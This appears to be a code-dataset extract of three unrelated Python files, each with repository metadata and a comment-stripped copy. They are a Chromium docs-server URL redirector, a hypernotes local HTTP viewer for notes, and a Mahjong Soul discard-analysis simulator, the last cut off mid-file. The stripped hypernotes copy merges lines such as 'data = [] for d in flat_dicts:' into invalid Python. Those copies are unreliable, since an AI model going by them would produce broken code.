chrome/common/extensions/docs/server2/redirector.py
|
carlosavignano/android_external_chromium_org
|
2b5652f7889ccad0fbdb1d52b04bad4c23769547
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2017-07-31T19:09:52.000Z
|
2019-01-04T18:48:50.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import posixpath
from urlparse import urlsplit
from file_system import FileNotFoundError
from third_party.json_schema_compiler.json_parse import Parse
class Redirector(object):
def __init__(self, compiled_fs_factory, file_system, root_path):
self._root_path = root_path
self._file_system = file_system
self._cache = compiled_fs_factory.Create(
lambda _, rules: Parse(rules), Redirector)
def Redirect(self, host, path):
''' Check if a path should be redirected, first according to host
redirection rules, then from rules in redirects.json files.
Returns the path that should be redirected to, or None if no redirection
should occur.
'''
return self._RedirectOldHosts(host, path) or self._RedirectFromConfig(path)
def _RedirectFromConfig(self, url):
''' Lookup the redirects configuration file in the directory that contains
the requested resource. If no redirection rule is matched, or no
configuration file exists, returns None.
'''
dirname, filename = posixpath.split(url)
try:
rules = self._cache.GetFromFile(
posixpath.join(self._root_path, dirname, 'redirects.json'))
except FileNotFoundError:
return None
redirect = rules.get(filename)
if redirect is None:
return None
if (redirect.startswith('/') or
urlsplit(redirect).scheme in ('http', 'https')):
return redirect
return posixpath.normpath('/' + posixpath.join(dirname, redirect))
def _RedirectOldHosts(self, host, path):
''' Redirect paths from the old code.google.com to the new
developer.chrome.com, retaining elements like the channel and https, if
used.
'''
if urlsplit(host).hostname != 'code.google.com':
return None
path = path.split('/')
if path and path[0] == 'chrome':
path.pop(0)
return 'https://developer.chrome.com/' + posixpath.join(*path)
def Cron(self):
''' Load files during a cron run.
'''
for root, dirs, files in self._file_system.Walk(self._root_path):
if 'redirects.json' in files:
self._cache.GetFromFile('%s/redirects.json' % posixpath.join(
self._root_path, root).rstrip('/'))
| 33.671429
| 79
| 0.698345
|
import posixpath
from urlparse import urlsplit
from file_system import FileNotFoundError
from third_party.json_schema_compiler.json_parse import Parse
class Redirector(object):
def __init__(self, compiled_fs_factory, file_system, root_path):
self._root_path = root_path
self._file_system = file_system
self._cache = compiled_fs_factory.Create(
lambda _, rules: Parse(rules), Redirector)
def Redirect(self, host, path):
return self._RedirectOldHosts(host, path) or self._RedirectFromConfig(path)
def _RedirectFromConfig(self, url):
dirname, filename = posixpath.split(url)
try:
rules = self._cache.GetFromFile(
posixpath.join(self._root_path, dirname, 'redirects.json'))
except FileNotFoundError:
return None
redirect = rules.get(filename)
if redirect is None:
return None
if (redirect.startswith('/') or
urlsplit(redirect).scheme in ('http', 'https')):
return redirect
return posixpath.normpath('/' + posixpath.join(dirname, redirect))
def _RedirectOldHosts(self, host, path):
if urlsplit(host).hostname != 'code.google.com':
return None
path = path.split('/')
if path and path[0] == 'chrome':
path.pop(0)
return 'https://developer.chrome.com/' + posixpath.join(*path)
def Cron(self):
for root, dirs, files in self._file_system.Walk(self._root_path):
if 'redirects.json' in files:
self._cache.GetFromFile('%s/redirects.json' % posixpath.join(
self._root_path, root).rstrip('/'))
| true
| true
|
1c48ff67557b59e0f6442687560f6b0bab68e410
| 5,974
|
py
|
Python
|
hypernotes/__main__.py
|
binste/hypernotes
|
4c9b82b7431f6af565318df58c03e764e9490eff
|
[
"MIT"
] | 3
|
2019-05-12T13:18:54.000Z
|
2020-08-29T02:25:05.000Z
|
hypernotes/__main__.py
|
binste/hypernotes
|
4c9b82b7431f6af565318df58c03e764e9490eff
|
[
"MIT"
] | null | null | null |
hypernotes/__main__.py
|
binste/hypernotes
|
4c9b82b7431f6af565318df58c03e764e9490eff
|
[
"MIT"
] | null | null | null |
import argparse
import json
import sys
import textwrap
import webbrowser
from datetime import datetime
from http.server import BaseHTTPRequestHandler, HTTPServer
from json import JSONEncoder
from typing import List
from hypernotes import (
Note,
Store,
_all_keys_from_dicts,
_flatten_notes,
_format_datetime,
_key_order,
)
class DatetimeNonReversibleJSONEncoder(JSONEncoder):
"""Encodes datetime objects as a string representation"""
def default(self, obj):
if isinstance(obj, datetime):
return _format_datetime(obj)
return super().default(obj)
def _format_notes_as_html(notes: List[Note]):
flat_dicts = _flatten_notes(notes)
all_keys = _all_keys_from_dicts(flat_dicts)
key_order = _key_order(all_keys)
data = [] # type: List[dict]
for d in flat_dicts:
row = {} # type: dict
for col in key_order:
row[col] = d.get(col, "")
data.append(row)
js_var_data = json.dumps(data, cls=DatetimeNonReversibleJSONEncoder)
# Points in column names need to be escaped for the 'data' attribute in datatables
escaped_columns = [col.replace(".", "\\\\.") for col in key_order]
js_columns = "[" + ", ".join(f'{{data: "{col}"}}' for col in escaped_columns) + "]"
js_table_tr = "<tr>" + "".join(f"<th>{col}</th>" for col in key_order) + "</tr>"
html_start = _html_start()
html_header = _html_header(js_var_data, js_columns)
html_body = _html_body(js_table_tr)
html_end = "</html>"
return html_start + html_header + html_body + html_end
def _html_start() -> str:
return textwrap.dedent(
"""\
<!DOCTYPE html>
<html>
"""
)
def _html_header(js_var_data: str, js_columns: str) -> str:
return textwrap.dedent(
f"""\
<head>
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap4.min.css">
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap4.min.js"></script>
<script type="text/javascript" class="init">
var data = {js_var_data}
$(document).ready(function () {{
$('#store_table').DataTable({{
data: data,
columns: {js_columns},
scrollX: true,
scrollY: '60vh',
scrollCollapse: true,
}}
);
}});
</script>
<style type="text/css" class="init">
div.dataTables_wrapper {{
width: 100%;
margin: 0 auto;
}}
th {{ font-size: 14px; }}
td {{ font-size: 13px; }}
</style>
<meta charset=utf-8 />
<title>Store - DataTable</title>
</head>
"""
)
def _html_body(js_table_tr: str) -> str:
return textwrap.dedent(
f"""\
<body>
<div class="page-header text-center">
<h1>Store Content</h1>
</div>
<hr>
<div class="container-fluid">
<div class="row mx-5">
<table id="store_table" class="table table-striped table-bordered" style="width:100%">
<thead>
{js_table_tr}
</thead>
</table>
</div>
</div>
</body>
"""
)
class HTMLResponder(BaseHTTPRequestHandler):
def do_GET(self):
html = _format_notes_as_html(store.load())
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(html.encode("utf-8"))
def _parse_args(args):
parser = argparse.ArgumentParser(
"This command-line interface can be used to"
+ " get a quick glance into a store.\n\nIt will start an http server and"
+ " automatically open the relevant page in your web browser."
+ " The page will contain an interactive table showing the most relevant"
+ " information of all notes in the store such as metrics, parameters, etc."
)
parser.add_argument("store_path", type=str, help="path to json store")
parser.add_argument(
"--ip",
type=str,
default="localhost",
help="ip to use for hosting the http server (default=localhost)",
)
parser.add_argument(
"--port", type=int, default=8080, help="port for http server (default=8080)"
)
parser.add_argument(
"--no-browser",
action="store_true",
help="can be passed to prevent automatic opening of web browser",
)
return parser.parse_args(args)
def main(raw_args):
global store
args = _parse_args(raw_args)
store = Store(args.store_path)
try:
server = HTTPServer((args.ip, args.port), HTMLResponder)
url = f"http://{args.ip}:{args.port}"
print(f"Started server on {url}. Server can be stopped with control+c / ctrl+c")
if not args.no_browser:
webbrowser.open_new_tab(url)
server.serve_forever()
except KeyboardInterrupt:
print("\nKeyboard interrupt recieved. Shutting down...")
server.socket.close()
if __name__ == "__main__":
main(sys.argv[1:])
| 32.291892
| 147
| 0.565283
|
import argparse
import json
import sys
import textwrap
import webbrowser
from datetime import datetime
from http.server import BaseHTTPRequestHandler, HTTPServer
from json import JSONEncoder
from typing import List
from hypernotes import (
Note,
Store,
_all_keys_from_dicts,
_flatten_notes,
_format_datetime,
_key_order,
)
class DatetimeNonReversibleJSONEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return _format_datetime(obj)
return super().default(obj)
def _format_notes_as_html(notes: List[Note]):
flat_dicts = _flatten_notes(notes)
all_keys = _all_keys_from_dicts(flat_dicts)
key_order = _key_order(all_keys)
data = [] for d in flat_dicts:
row = {} for col in key_order:
row[col] = d.get(col, "")
data.append(row)
js_var_data = json.dumps(data, cls=DatetimeNonReversibleJSONEncoder)
escaped_columns = [col.replace(".", "\\\\.") for col in key_order]
js_columns = "[" + ", ".join(f'{{data: "{col}"}}' for col in escaped_columns) + "]"
js_table_tr = "<tr>" + "".join(f"<th>{col}</th>" for col in key_order) + "</tr>"
html_start = _html_start()
html_header = _html_header(js_var_data, js_columns)
html_body = _html_body(js_table_tr)
html_end = "</html>"
return html_start + html_header + html_body + html_end
def _html_start() -> str:
return textwrap.dedent(
"""\
<!DOCTYPE html>
<html>
"""
)
def _html_header(js_var_data: str, js_columns: str) -> str:
return textwrap.dedent(
f"""\
<head>
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap4.min.css">
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap4.min.js"></script>
<script type="text/javascript" class="init">
var data = {js_var_data}
$(document).ready(function () {{
$('#store_table').DataTable({{
data: data,
columns: {js_columns},
scrollX: true,
scrollY: '60vh',
scrollCollapse: true,
}}
);
}});
</script>
<style type="text/css" class="init">
div.dataTables_wrapper {{
width: 100%;
margin: 0 auto;
}}
th {{ font-size: 14px; }}
td {{ font-size: 13px; }}
</style>
<meta charset=utf-8 />
<title>Store - DataTable</title>
</head>
"""
)
def _html_body(js_table_tr: str) -> str:
return textwrap.dedent(
f"""\
<body>
<div class="page-header text-center">
<h1>Store Content</h1>
</div>
<hr>
<div class="container-fluid">
<div class="row mx-5">
<table id="store_table" class="table table-striped table-bordered" style="width:100%">
<thead>
{js_table_tr}
</thead>
</table>
</div>
</div>
</body>
"""
)
class HTMLResponder(BaseHTTPRequestHandler):
def do_GET(self):
html = _format_notes_as_html(store.load())
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(html.encode("utf-8"))
def _parse_args(args):
parser = argparse.ArgumentParser(
"This command-line interface can be used to"
+ " get a quick glance into a store.\n\nIt will start an http server and"
+ " automatically open the relevant page in your web browser."
+ " The page will contain an interactive table showing the most relevant"
+ " information of all notes in the store such as metrics, parameters, etc."
)
parser.add_argument("store_path", type=str, help="path to json store")
parser.add_argument(
"--ip",
type=str,
default="localhost",
help="ip to use for hosting the http server (default=localhost)",
)
parser.add_argument(
"--port", type=int, default=8080, help="port for http server (default=8080)"
)
parser.add_argument(
"--no-browser",
action="store_true",
help="can be passed to prevent automatic opening of web browser",
)
return parser.parse_args(args)
def main(raw_args):
global store
args = _parse_args(raw_args)
store = Store(args.store_path)
try:
server = HTTPServer((args.ip, args.port), HTMLResponder)
url = f"http://{args.ip}:{args.port}"
print(f"Started server on {url}. Server can be stopped with control+c / ctrl+c")
if not args.no_browser:
webbrowser.open_new_tab(url)
server.serve_forever()
except KeyboardInterrupt:
print("\nKeyboard interrupt recieved. Shutting down...")
server.socket.close()
if __name__ == "__main__":
main(sys.argv[1:])
| true
| true
|
1c48ffccdfa3319a9b61c00093524eea86090cba
| 984
|
py
|
Python
|
objects/CSCG/_2d/mesh/trace/elements/element/IS.py
|
mathischeap/mifem
|
3242e253fb01ca205a76568eaac7bbdb99e3f059
|
[
"MIT"
] | 1
|
2020-10-14T12:48:35.000Z
|
2020-10-14T12:48:35.000Z
|
objects/CSCG/_2d/mesh/trace/elements/element/IS.py
|
mathischeap/mifem
|
3242e253fb01ca205a76568eaac7bbdb99e3f059
|
[
"MIT"
] | null | null | null |
objects/CSCG/_2d/mesh/trace/elements/element/IS.py
|
mathischeap/mifem
|
3242e253fb01ca205a76568eaac7bbdb99e3f059
|
[
"MIT"
] | null | null | null |
from screws.freeze.base import FrozenOnly
class _2dCSCG_TraceElement_IS(FrozenOnly):
""""""
def __init__(self, element):
""""""
self._element_ = element
self._shared_by_cores_ = None
self._freeze_self_()
@property
def on_mesh_boundary(self):
return self._element_._ondb_
@property
def on_periodic_boundary(self):
return self._element_._onpb_
@property
def shared_by_cores(self):
""""""
if self._shared_by_cores_ is None:
if self.on_mesh_boundary:
self._shared_by_cores_ = False
else:
if int(self._element_._p1_[:-1]) in self._element_._elements_._mesh_.elements and \
int(self._element_._p2_[:-1]) in self._element_._elements_._mesh_.elements:
self._shared_by_cores_ = False
else:
self._shared_by_cores_ = True
return self._shared_by_cores_
| 28.114286
| 99
| 0.601626
|
from screws.freeze.base import FrozenOnly
class _2dCSCG_TraceElement_IS(FrozenOnly):
def __init__(self, element):
self._element_ = element
self._shared_by_cores_ = None
self._freeze_self_()
@property
def on_mesh_boundary(self):
return self._element_._ondb_
@property
def on_periodic_boundary(self):
return self._element_._onpb_
@property
def shared_by_cores(self):
if self._shared_by_cores_ is None:
if self.on_mesh_boundary:
self._shared_by_cores_ = False
else:
if int(self._element_._p1_[:-1]) in self._element_._elements_._mesh_.elements and \
int(self._element_._p2_[:-1]) in self._element_._elements_._mesh_.elements:
self._shared_by_cores_ = False
else:
self._shared_by_cores_ = True
return self._shared_by_cores_
| true
| true
|
1c4900032cd45dc5468c37bdc9b924e6040e0960
| 11,860
|
py
|
Python
|
majsoul/simulator.py
|
canuse/majsoul-record-parser
|
33e7e42c5e852e44f4be8e79f6af07737b4f43af
|
[
"MIT"
] | 1
|
2019-12-03T12:12:37.000Z
|
2019-12-03T12:12:37.000Z
|
majsoul/simulator.py
|
canuse/majsoul-record-parser
|
33e7e42c5e852e44f4be8e79f6af07737b4f43af
|
[
"MIT"
] | 3
|
2019-11-28T10:09:42.000Z
|
2019-12-20T14:04:20.000Z
|
majsoul/simulator.py
|
canuse/majsoul-record-parser
|
33e7e42c5e852e44f4be8e79f6af07737b4f43af
|
[
"MIT"
] | null | null | null |
from majsoul.parser import *
from majsoul.reasoner import *
from majsoul.template import *
class simulator:
def __init__(self, record: Game, username):
self.record = record
self.playername = username
self.users = record.players.playernames
self.posInUser = self.users.index(self.playername)
self.gametype = 0
self.playernum = record.players.num
self.isrichi = False
self.report = [games(record.uuid)]
self.melds = []
def simulate(self):
for i in self.record.roundList:
self.simulateRound(i)
def initround(self, roundData: Round):
self.handtile = roundData.handTiles[self.posInUser]
for i in range(len(self.handtile)):
if self.handtile[i] in ['0s', '0m', '0p']:
self.handtile[i] = Tile.valueToTile(Tile.tileToValue(self.handtile[i]))
self.visibleTile = [0 for i in range(38)]
self.doraNum = 1
self.paishan = roundData.paishan
self.isrichi = False
self.melds = []
self.game = game(str(roundData))
for i in self.handtile:
self.visibleTile[Tile.tileToValue(i)] += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-9])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-5])] += 1
def deal(self, item: Item):
if item.isliqi == 1:
self.isrichi = True
if item.playername == self.playername:
xh, choices = self.calculateBest()
allchoice = [i[0] for i in choices]
goodchoice = []
for i in choices:
if i[1] == choices[0][1]:
goodchoice.append(i[0])
cc = []
for i in choices:
tmp = ''
for j in i[-1]:
tmp = tmp + Tile.tileToUtf(Tile.valueToTile(j))
cc.append((Tile.tileToUtf(i[0]), i[1], i[2], tmp))
if Tile.valueToTile(Tile.tileToValue(item.tile)) in allchoice:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
bestRateP = choices[0][1]
yourRateP = choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1]
bestRate = 1 - (1 - bestRateP / invisibleTiles) * (1 - bestRateP / (invisibleTiles - 1))
yourRate = 1 - (1 - yourRateP / invisibleTiles) * (1 - yourRateP / (invisibleTiles - 1))
wrong_rate = 1 - yourRate / bestRate
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, wrong_rate, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice],
choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][2],
choices[0][2], len(self.game.round) + 1, bestRateP, yourRateP, cc)
self.game.round.append(tround)
print(
'Your choice:{0},{1} Best choices:{2},{3}'.format(item.tile, choices[
allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1],
choices[0][0], choices[0][1]))
else:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
bestRateP = choices[0][1]
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, 1, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice], choices[0][2] + 1, choices[0][2],
len(self.game.round) + 1,
bestRateP, -1, cc)
self.game.round.append(tround)
print('wrong')
# todo check
print(item.tile, self.handtile)
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def discard(self, item: Item):
if item.playername != self.playername:
return
if item.tile in ['0s', '0m', '0p']:
self.handtile.append(Tile.valueToTile(Tile.tileToValue(item.tile)))
else:
self.handtile.append(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.sort(key=Tile.tileToValue)
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def babei(self, item: Item):
if item.playername == self.playername:
self.handtile.remove('4z')
self.melds.append((Tile.tileToUtf('4z')))
return
self.visibleTile[34] += 1
def chi(self, item: Item):
if item.playername == self.playername:
if item.eatstatus == 1:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.nextTile(Tile.nextTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.nextTile(Tile.nextTile(item.tile)))))
if item.eatstatus == 2:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.prevTile(item.tile))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(item.tile))))
if item.eatstatus == 3:
self.handtile.remove(Tile.prevTile(item.tile))
self.handtile.remove(Tile.prevTile(Tile.prevTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.prevTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(Tile.prevTile(item.tile)))))
return
else:
if item.eatstatus == 1:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.nextTile(Tile.nextTile(item.tile)))] += 1
if item.eatstatus == 2:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
if item.eatstatus == 3:
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(Tile.prevTile(item.tile)))] += 1
def peng(self, item: Item):
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 2
def gang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 3
def addGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.remove((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 3
def anGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append(
(Tile.tileToUtf('8z'), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf('8z')))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 4
def calculateBest(self):
a = reasoner()
choices, xh = a.discardTileList([Tile.tileToValue(i) for i in self.handtile], self.playernum)
bestChoices = []
for i in choices.keys():
tmp = 0
for j in choices[i][0]:
tmp += 4 - self.visibleTile[j]
bestChoices.append((i, tmp, choices[i][1], choices[i][0]))
bestChoices.sort(key=lambda x: x[1], reverse=True)
return xh, bestChoices
def simulateRound(self, roundData: Round):
self.initround(roundData)
print('new round!!!')
for i in roundData.itemList:
# print(self.handtile)
# print(self.visibleTile)
if i.op.value == 1:
self.deal(i)
if i.op.value == 2:
self.discard(i)
if i.op.value == 10:
self.babei(i)
if i.op.value == -1:
self.chi(i)
if i.op.value == -2:
self.peng(i)
if i.op.value == -3:
self.gang(i)
if i.op.value == -4:
self.addGang(i)
if i.op.value == -5:
self.anGang(i)
if i.op.value == 0 or i.op.value == -10:
self.report[0].game.append(self.game)
| 46.509804
| 115
| 0.536509
|
from majsoul.parser import *
from majsoul.reasoner import *
from majsoul.template import *
class simulator:
def __init__(self, record: Game, username):
self.record = record
self.playername = username
self.users = record.players.playernames
self.posInUser = self.users.index(self.playername)
self.gametype = 0
self.playernum = record.players.num
self.isrichi = False
self.report = [games(record.uuid)]
self.melds = []
def simulate(self):
for i in self.record.roundList:
self.simulateRound(i)
def initround(self, roundData: Round):
self.handtile = roundData.handTiles[self.posInUser]
for i in range(len(self.handtile)):
if self.handtile[i] in ['0s', '0m', '0p']:
self.handtile[i] = Tile.valueToTile(Tile.tileToValue(self.handtile[i]))
self.visibleTile = [0 for i in range(38)]
self.doraNum = 1
self.paishan = roundData.paishan
self.isrichi = False
self.melds = []
self.game = game(str(roundData))
for i in self.handtile:
self.visibleTile[Tile.tileToValue(i)] += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-9])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-5])] += 1
def deal(self, item: Item):
if item.isliqi == 1:
self.isrichi = True
if item.playername == self.playername:
xh, choices = self.calculateBest()
allchoice = [i[0] for i in choices]
goodchoice = []
for i in choices:
if i[1] == choices[0][1]:
goodchoice.append(i[0])
cc = []
for i in choices:
tmp = ''
for j in i[-1]:
tmp = tmp + Tile.tileToUtf(Tile.valueToTile(j))
cc.append((Tile.tileToUtf(i[0]), i[1], i[2], tmp))
if Tile.valueToTile(Tile.tileToValue(item.tile)) in allchoice:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
bestRateP = choices[0][1]
yourRateP = choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1]
bestRate = 1 - (1 - bestRateP / invisibleTiles) * (1 - bestRateP / (invisibleTiles - 1))
yourRate = 1 - (1 - yourRateP / invisibleTiles) * (1 - yourRateP / (invisibleTiles - 1))
wrong_rate = 1 - yourRate / bestRate
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, wrong_rate, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice],
choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][2],
choices[0][2], len(self.game.round) + 1, bestRateP, yourRateP, cc)
self.game.round.append(tround)
print(
'Your choice:{0},{1} Best choices:{2},{3}'.format(item.tile, choices[
allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1],
choices[0][0], choices[0][1]))
else:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
bestRateP = choices[0][1]
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, 1, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice], choices[0][2] + 1, choices[0][2],
len(self.game.round) + 1,
bestRateP, -1, cc)
self.game.round.append(tround)
print('wrong')
print(item.tile, self.handtile)
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def discard(self, item: Item):
if item.playername != self.playername:
return
if item.tile in ['0s', '0m', '0p']:
self.handtile.append(Tile.valueToTile(Tile.tileToValue(item.tile)))
else:
self.handtile.append(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.sort(key=Tile.tileToValue)
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def babei(self, item: Item):
if item.playername == self.playername:
self.handtile.remove('4z')
self.melds.append((Tile.tileToUtf('4z')))
return
self.visibleTile[34] += 1
def chi(self, item: Item):
if item.playername == self.playername:
if item.eatstatus == 1:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.nextTile(Tile.nextTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.nextTile(Tile.nextTile(item.tile)))))
if item.eatstatus == 2:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.prevTile(item.tile))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(item.tile))))
if item.eatstatus == 3:
self.handtile.remove(Tile.prevTile(item.tile))
self.handtile.remove(Tile.prevTile(Tile.prevTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.prevTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(Tile.prevTile(item.tile)))))
return
else:
if item.eatstatus == 1:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.nextTile(Tile.nextTile(item.tile)))] += 1
if item.eatstatus == 2:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
if item.eatstatus == 3:
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(Tile.prevTile(item.tile)))] += 1
def peng(self, item: Item):
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 2
def gang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
